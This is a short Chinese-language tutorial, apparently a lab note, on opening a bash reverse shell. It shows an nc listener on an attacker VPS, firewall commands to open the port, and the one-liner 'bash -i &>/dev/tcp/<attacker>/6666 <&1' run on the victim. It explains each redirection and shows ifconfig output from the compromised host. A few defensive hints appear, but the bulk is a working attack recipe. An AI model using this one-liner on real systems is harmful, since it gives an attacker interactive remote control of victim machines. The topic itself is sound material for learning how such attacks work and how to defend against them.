安装nc
yum -y install nc
在vps(攻击机,ip地址为192.168.2.200)上监听6666端口
nc -lvnp 6666
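需要在vps的防火墙上开放监听端口。注意:nc不加-u时监听的是TCP,/dev/tcp建立的也是TCP连接,而下面记录中开放的是6666/udp,协议并不一致;另外--permanent会让规则在重启后仍然保留,实验结束后应当用--remove-port删除这条规则并重新reload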
- [root@localhost sc]# firewall-cmd --zone=public --add-port=6666/udp --permanent
- success
- [root@localhost sc]# firewall-cmd --reload
- success
在被攻击机器(192.168.26.131)上执行
bash -c 'exec bash -i &>/dev/tcp/192.168.2.200/6666 <&1'
解释
#bash -i 打开一个交互的bash
# &>(也可写作 >&)将标准输出和标准错误输出一起重定向到后面的目标,这里即/dev/tcp建立的socket
#/dev/tcp/x.x.x.x/port 是bash在重定向中识别的特殊路径(并非真实的设备文件),bash会据此建立一条TCP socket连接,其中x.x.x.x为要反弹到的主机ip,port为该主机上监听的端口
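# <&1 等价于 0<&1(常见写法 0>&1 效果相同),把标准输入复制为与标准输出相同的文件描述符,也就是同一个socket,这样对端输入的内容会被这个bash读取,从而实现你与反弹出来的shell的交互
# 从防守角度看,此时该bash进程的标准输入、标准输出、标准错误都指向同一条对外TCP连接,可以通过查看/proc/<PID>/fd发现;限制服务器的出站连接也能阻断这类回连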
在vps的nc监听窗口中可以输入任意命令,命令实际在被攻击机器上执行(下面ifconfig输出中的192.168.26.131就是被攻击机器的地址)
- [root@localhost gh]# ifconfig
- ifconfig
- eth0 Link encap:Ethernet HWaddr 01:0C:29:6E:37:0A
- inet addr:192.168.26.131 Bcast:192.168.26.255 Mask:255.255.255.0
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:22825 errors:0 dropped:0 overruns:0 frame:0
- TX packets:15829 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:15634385 (14.9 MiB) TX bytes:10275166 (9.7 MiB)
-
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:16436 Metric:1
- RX packets:394 errors:0 dropped:0 overruns:0 frame:0
- TX packets:394 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:40686 (39.7 KiB) TX bytes:40686 (39.7 KiB)